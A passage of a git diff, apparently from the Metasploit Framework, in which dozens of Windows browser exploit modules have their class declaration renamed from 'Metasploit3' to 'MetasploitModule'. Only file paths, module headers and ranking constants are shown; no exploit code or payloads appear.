b/modules/exploits/windows/browser/novelliprint_datetime.rb index d247e134c7..fb669b078b 100644 --- a/modules/exploits/windows/browser/novelliprint_datetime.rb +++ b/modules/exploits/windows/browser/novelliprint_datetime.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novelliprint_executerequest.rb b/modules/exploits/windows/browser/novelliprint_executerequest.rb index 6ec5f52b65..8cfc00ade1 100644 --- a/modules/exploits/windows/browser/novelliprint_executerequest.rb +++ b/modules/exploits/windows/browser/novelliprint_executerequest.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb b/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb index cc6954458c..20a29ec374 100644 --- a/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb +++ b/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb @@ -34,7 +34,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb index fd55d572ea..c784347f9d 100644 --- a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb +++ b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb b/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb index 70db241a7c..6badf5ec16 100644 --- a/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb +++ b/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novelliprint_target_frame.rb b/modules/exploits/windows/browser/novelliprint_target_frame.rb index 4461b2a70e..34573d0248 100644 --- a/modules/exploits/windows/browser/novelliprint_target_frame.rb +++ b/modules/exploits/windows/browser/novelliprint_target_frame.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ntr_activex_check_bof.rb b/modules/exploits/windows/browser/ntr_activex_check_bof.rb index 846f4befde..611029ad99 100644 --- a/modules/exploits/windows/browser/ntr_activex_check_bof.rb +++ b/modules/exploits/windows/browser/ntr_activex_check_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ntr_activex_stopmodule.rb b/modules/exploits/windows/browser/ntr_activex_stopmodule.rb index 9c195aa332..e943b11db0 100644 --- a/modules/exploits/windows/browser/ntr_activex_stopmodule.rb +++ b/modules/exploits/windows/browser/ntr_activex_stopmodule.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb b/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb index 694e4d6431..f4cccba075 100644 --- a/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb +++ b/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb b/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb index 51961e8099..a369d42b06 100644 --- a/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb +++ b/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb index f80e83d451..9335d80815 100644 --- a/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb +++ b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/orbit_connecting.rb b/modules/exploits/windows/browser/orbit_connecting.rb index 5295485415..5ecae278aa 100644 --- a/modules/exploits/windows/browser/orbit_connecting.rb +++ b/modules/exploits/windows/browser/orbit_connecting.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ovftool_format_string.rb b/modules/exploits/windows/browser/ovftool_format_string.rb index 34d945a5d1..7184ac812a 100644 --- a/modules/exploits/windows/browser/ovftool_format_string.rb +++ b/modules/exploits/windows/browser/ovftool_format_string.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/pcvue_func.rb b/modules/exploits/windows/browser/pcvue_func.rb index c5c57b34c1..d4018ccb1e 100644 --- a/modules/exploits/windows/browser/pcvue_func.rb +++ b/modules/exploits/windows/browser/pcvue_func.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/persits_xupload_traversal.rb b/modules/exploits/windows/browser/persits_xupload_traversal.rb index a74f4bcff9..3d508ab03b 100644 --- a/modules/exploits/windows/browser/persits_xupload_traversal.rb +++ b/modules/exploits/windows/browser/persits_xupload_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/quickr_qp2_bof.rb b/modules/exploits/windows/browser/quickr_qp2_bof.rb index d260b5ba37..af452faef1 100644 --- a/modules/exploits/windows/browser/quickr_qp2_bof.rb +++ b/modules/exploits/windows/browser/quickr_qp2_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/real_arcade_installerdlg.rb b/modules/exploits/windows/browser/real_arcade_installerdlg.rb index c2afc67f27..f24cab863b 100644 --- a/modules/exploits/windows/browser/real_arcade_installerdlg.rb +++ b/modules/exploits/windows/browser/real_arcade_installerdlg.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/realplayer_cdda_uri.rb b/modules/exploits/windows/browser/realplayer_cdda_uri.rb index 75f94ecd5b..049dfae49f 100644 --- a/modules/exploits/windows/browser/realplayer_cdda_uri.rb +++ b/modules/exploits/windows/browser/realplayer_cdda_uri.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/realplayer_console.rb b/modules/exploits/windows/browser/realplayer_console.rb index 33fedfc9c6..5e8066f7bb 100644 --- a/modules/exploits/windows/browser/realplayer_console.rb +++ b/modules/exploits/windows/browser/realplayer_console.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/realplayer_import.rb b/modules/exploits/windows/browser/realplayer_import.rb index 0aab25f860..8af7086610 100644 --- a/modules/exploits/windows/browser/realplayer_import.rb +++ b/modules/exploits/windows/browser/realplayer_import.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/realplayer_qcp.rb b/modules/exploits/windows/browser/realplayer_qcp.rb index 9a14d5500a..5b81c4d16d 100644 --- a/modules/exploits/windows/browser/realplayer_qcp.rb +++ b/modules/exploits/windows/browser/realplayer_qcp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/realplayer_smil.rb b/modules/exploits/windows/browser/realplayer_smil.rb index 7c0cc98bb6..2523e574e7 100644 --- a/modules/exploits/windows/browser/realplayer_smil.rb +++ b/modules/exploits/windows/browser/realplayer_smil.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/roxio_cineplayer.rb b/modules/exploits/windows/browser/roxio_cineplayer.rb index af12347a60..262b0480b4 100644 --- a/modules/exploits/windows/browser/roxio_cineplayer.rb +++ b/modules/exploits/windows/browser/roxio_cineplayer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/safari_xslt_output.rb b/modules/exploits/windows/browser/safari_xslt_output.rb index d6fe45cc71..2397e4d9f4 100644 --- a/modules/exploits/windows/browser/safari_xslt_output.rb +++ b/modules/exploits/windows/browser/safari_xslt_output.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb b/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb index 74706eabcb..057ff83b3c 100644 --- a/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb +++ b/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb b/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb index 3fee969510..b53b4c019d 100644 --- a/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb +++ b/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb b/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb index 33f43e125b..73ca64f4bd 100644 --- a/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb +++ b/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/softartisans_getdrivename.rb b/modules/exploits/windows/browser/softartisans_getdrivename.rb index b234fe3cdb..7649666ea1 100644 --- a/modules/exploits/windows/browser/softartisans_getdrivename.rb +++ b/modules/exploits/windows/browser/softartisans_getdrivename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/sonicwall_addrouteentry.rb b/modules/exploits/windows/browser/sonicwall_addrouteentry.rb index 826b8ebc90..6244740d46 100644 --- a/modules/exploits/windows/browser/sonicwall_addrouteentry.rb +++ b/modules/exploits/windows/browser/sonicwall_addrouteentry.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb index de69777a84..f35dcf5e4e 100644 --- a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb +++ b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb b/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb index bdad1cf0ff..b76478f196 100644 --- a/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb +++ b/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking diff --git a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb index 034b2bb5a2..75d5bcdeb2 100644 --- a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb +++ b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb b/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb index aa83462d25..eb84ff49fe 100644 --- a/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb +++ b/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb b/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb index 040559c4ba..6ab6a8ac97 100644 --- a/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb +++ b/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb b/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb index e3471a628f..f950ccbaac 100644 --- a/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb +++ b/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb index 0d0a45ad76..90f780c73f 100644 --- a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb +++ b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/teechart_pro.rb b/modules/exploits/windows/browser/teechart_pro.rb index d699f52c02..4540017403 100644 --- a/modules/exploits/windows/browser/teechart_pro.rb +++ b/modules/exploits/windows/browser/teechart_pro.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb index c784f2aace..4544396f52 100644 --- a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb +++ b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/trendmicro_extsetowner.rb b/modules/exploits/windows/browser/trendmicro_extsetowner.rb index 8d3c754bbf..27990a4b47 100644 --- a/modules/exploits/windows/browser/trendmicro_extsetowner.rb +++ b/modules/exploits/windows/browser/trendmicro_extsetowner.rb @@ -33,7 +33,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/trendmicro_officescan.rb b/modules/exploits/windows/browser/trendmicro_officescan.rb index 94fbfcded7..ad5a5c58d1 100644 --- a/modules/exploits/windows/browser/trendmicro_officescan.rb +++ b/modules/exploits/windows/browser/trendmicro_officescan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/tumbleweed_filetransfer.rb b/modules/exploits/windows/browser/tumbleweed_filetransfer.rb index f012e29f3c..def0203920 100644 --- a/modules/exploits/windows/browser/tumbleweed_filetransfer.rb +++ b/modules/exploits/windows/browser/tumbleweed_filetransfer.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb b/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb index 8bbdc303e6..8d4387ffd8 100644 --- a/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb +++ b/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb b/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb index cdb9360048..3f80edb8c0 100644 --- a/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb +++ b/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ultraoffice_httpupload.rb b/modules/exploits/windows/browser/ultraoffice_httpupload.rb index 05b995f2ba..d7edd41d46 100644 --- a/modules/exploits/windows/browser/ultraoffice_httpupload.rb +++ b/modules/exploits/windows/browser/ultraoffice_httpupload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/verypdf_pdfview.rb b/modules/exploits/windows/browser/verypdf_pdfview.rb index 9ad826a3e4..a3fc6e77cf 100644 --- a/modules/exploits/windows/browser/verypdf_pdfview.rb +++ b/modules/exploits/windows/browser/verypdf_pdfview.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb index 5aac5af13b..b9a6736cdb 100644 --- a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb +++ b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/vlc_amv.rb b/modules/exploits/windows/browser/vlc_amv.rb index b6d98e0d67..e414e6fa6f 100644 --- a/modules/exploits/windows/browser/vlc_amv.rb +++ b/modules/exploits/windows/browser/vlc_amv.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/vlc_mms_bof.rb b/modules/exploits/windows/browser/vlc_mms_bof.rb index 69886b5b78..2e33ace44f 100644 --- a/modules/exploits/windows/browser/vlc_mms_bof.rb +++ b/modules/exploits/windows/browser/vlc_mms_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/webdav_dll_hijacker.rb b/modules/exploits/windows/browser/webdav_dll_hijacker.rb index 0751a93afc..7f4ca9edc9 100644 --- a/modules/exploits/windows/browser/webdav_dll_hijacker.rb +++ b/modules/exploits/windows/browser/webdav_dll_hijacker.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # diff --git a/modules/exploits/windows/browser/webex_ucf_newobject.rb b/modules/exploits/windows/browser/webex_ucf_newobject.rb index a4aa0fee3e..6e337c99a7 100644 --- a/modules/exploits/windows/browser/webex_ucf_newobject.rb +++ b/modules/exploits/windows/browser/webex_ucf_newobject.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb b/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb index 6efae24eeb..ea7cda3260 100644 --- a/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb +++ b/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/winamp_playlist_unc.rb b/modules/exploits/windows/browser/winamp_playlist_unc.rb index eaba3e96eb..2ff8713b12 100644 --- a/modules/exploits/windows/browser/winamp_playlist_unc.rb +++ b/modules/exploits/windows/browser/winamp_playlist_unc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/browser/winamp_ultravox.rb b/modules/exploits/windows/browser/winamp_ultravox.rb index 3d2cc4191f..ffd09d661d 100644 --- a/modules/exploits/windows/browser/winamp_ultravox.rb +++ b/modules/exploits/windows/browser/winamp_ultravox.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/browser/windvd7_applicationtype.rb b/modules/exploits/windows/browser/windvd7_applicationtype.rb index 4d7d428b0a..362458f78b 100644 --- a/modules/exploits/windows/browser/windvd7_applicationtype.rb +++ b/modules/exploits/windows/browser/windvd7_applicationtype.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/winzip_fileview.rb b/modules/exploits/windows/browser/winzip_fileview.rb index 725d4f1f67..9ceeca87a3 100644 --- a/modules/exploits/windows/browser/winzip_fileview.rb +++ b/modules/exploits/windows/browser/winzip_fileview.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/wmi_admintools.rb b/modules/exploits/windows/browser/wmi_admintools.rb index 085e90f186..e73dab9d78 100644 --- a/modules/exploits/windows/browser/wmi_admintools.rb +++ b/modules/exploits/windows/browser/wmi_admintools.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb b/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb index 7a0c664d80..07d4cd0d81 100644 --- a/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb +++ b/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/xmplay_asx.rb b/modules/exploits/windows/browser/xmplay_asx.rb index 4e53c13709..151f2e87c7 100644 --- a/modules/exploits/windows/browser/xmplay_asx.rb +++ b/modules/exploits/windows/browser/xmplay_asx.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/yahoomessenger_fvcom.rb b/modules/exploits/windows/browser/yahoomessenger_fvcom.rb index 6fdd49587e..64fa89bcaa 100644 --- a/modules/exploits/windows/browser/yahoomessenger_fvcom.rb +++ b/modules/exploits/windows/browser/yahoomessenger_fvcom.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/yahoomessenger_server.rb b/modules/exploits/windows/browser/yahoomessenger_server.rb index 96d12e137b..b50153df05 100644 --- a/modules/exploits/windows/browser/yahoomessenger_server.rb +++ b/modules/exploits/windows/browser/yahoomessenger_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb index ce4d676070..c337ced797 100644 --- a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb +++ b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < 